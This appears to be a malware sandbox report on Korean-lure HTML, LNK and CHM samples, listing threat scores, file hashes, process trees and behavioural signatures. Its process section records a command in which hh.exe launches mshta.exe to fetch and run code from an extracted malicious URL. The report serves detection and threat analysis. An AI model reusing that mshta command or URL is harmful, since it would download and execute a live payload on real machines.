Overview
Score  Task                  Platform
10     Static                -
8      LG유플....html         windows7-x64
1      LG유플....html         windows10-2004-x64
1      LG유플...ml.lnk        windows7-x64
10     LG유플...ml.lnk        windows10-2004-x64
10     MAIL_20230...02.chm   windows7-x64
10     MAIL_20230...02.chm   windows10-2004-x64
10     Message.chm           windows7-x64
10     Message.chm           windows10-2004-x64
10     Message.chm           windows7-x64
10     Message.chm           windows10-2004-x64
Analysis
max time kernel: 147s
max time network: 149s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 21-03-2023 23:32
Behavioral tasks
behavioral1: LG유플러스_이동통신_202208_이_선.html (resource win7-20230220-en)
behavioral2: LG유플러스_이동통신_202208_이_선.html (resource win10v2004-20230220-en)
behavioral3: LG유플러스_이동통신_202208_이_선.html.lnk (resource win7-20230220-en)
behavioral4: LG유플러스_이동통신_202208_이_선.html.lnk (resource win10v2004-20230220-en)
behavioral5: MAIL_20230125151802.chm (resource win7-20230220-en)
behavioral6: MAIL_20230125151802.chm (resource win10v2004-20230221-en)
behavioral7: Message.chm (resource win7-20230220-en)
behavioral8: Message.chm (resource win10v2004-20230220-en)
behavioral9: Message.chm (resource win7-20230220-en)
behavioral10: Message.chm (resource win10v2004-20230220-en)
General
Target: Message.chm
Size: 23KB
MD5: a2a8094933150e18fb31f24b5e20643b
SHA1: e4a2958358b33ad814828efeaa6295eb46510599
SHA256: c529b6e0b012d8246f9f2720f72253d8d52a1a58f2ee3db32128b2a96c813b9a
SHA512: 24b43e8452d0b0fc76cb60e6c99e2537c7038ab6808f48ce1578733f1b39e53cffd2a437338ecbcec43944b6331a08657918cb6cfdbaa89db6c2e85ebdf0a6c9
SSDEEP: 384:2yOvnvzjch5duuyTvBLalWcOrFETyshkB+6tBUMk0zpU:2yOvnbwhv+v1rc4FE+shq+67ZpU
Malware Config
Extracted URL: http://attiferstudio.com/install.bak/sony/7.html
Signatures

Blocklisted process makes network request (1 IoC)
Processes (flow, pid, process):
  7  520  mshta.exe

Modifies Internet Explorer settings
Processes (description, ioc, process):
  Key created  \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main  hh.exe
  Key created  \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe

Suspicious use of AdjustPrivilegeToken (11 IoCs)
Processes (description, pid, process):
  Token: 33                          1456  AUDIODG.EXE
  Token: SeIncBasePriorityPrivilege  1456  AUDIODG.EXE
  Token: 33                          1456  AUDIODG.EXE
  Token: SeIncBasePriorityPrivilege  1456  AUDIODG.EXE
  Token: SeRestorePrivilege          1292  hh.exe  (reported 7 times)

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes (pid, process):
  1292  hh.exe  (reported 2 times)

Suspicious use of WriteProcessMemory (3 IoCs)
Processes (description, pid, process, target process):
  PID 1292 wrote to memory of 520  1292  hh.exe  mshta.exe  (reported 3 times)

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

hh.exe (depth 1)
Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\Message.chm
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory

mshta.exe (depth 2, spawned under hh.exe)
Command line: "C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/7.html ,
- Blocklisted process makes network request
- Modifies Internet Explorer settings

AUDIODG.EXE (depth 1)
Command line: C:\Windows\system32\AUDIODG.EXE 0x57c
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
  Filesize: 61KB
  MD5: e71c8443ae0bc2e282c73faead0a6dd3
  SHA1: 0c110c1b01e68edfacaeae64781a37b1995fa94b
  SHA256: 95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
  SHA512: b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S7FIT0B8\INISAFEMailv4[1].cab
  Filesize: 2.2MB
  MD5: 8abb4e13ee3f94df4b5e276ef6cb0144
  SHA1: 819db68fcd5a8673383c82898b729f16b77054d2
  SHA256: c0eee87ea1144be28d12e5af7a3307c6a690029bef1e7b43ca08aa8fde0f2c61
  SHA512: f9bbb330cf5615cefed666c84010b685feb4f8cc7e36c1044e57a22b2a5fc7bd4a922157bc9acdfe49629d7bff0eaec6cfd336a2732a25cb895c574a2c2ea930

C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\INISAFEMailv4.inf
  Filesize: 538B
  MD5: 10418288c546673054c4bd83220ffeef
  SHA1: b179588f320e234899a101ecd651bd024569d8bc
  SHA256: eff48ef0b99ff404fed484df294d18018c5be12fcc7d2d778c18fd0d01c07971
  SHA512: a96a226821148090c1de744552a3d26c858070cb4ee60c508bf29ef9ff302a85bcfd23c7fbd10c8f9c5871e43f6ff1919e2a9e08c05e7c6127943b485ba6b160

C:\Users\Admin\AppData\Local\Temp\Tar4E0A.tmp
  Filesize: 161KB
  MD5: be2bec6e8c5653136d3e72fe53c98aa3
  SHA1: a8182d6db17c14671c3d5766c72e58d87c0810de
  SHA256: 1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd
  SHA512: 0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff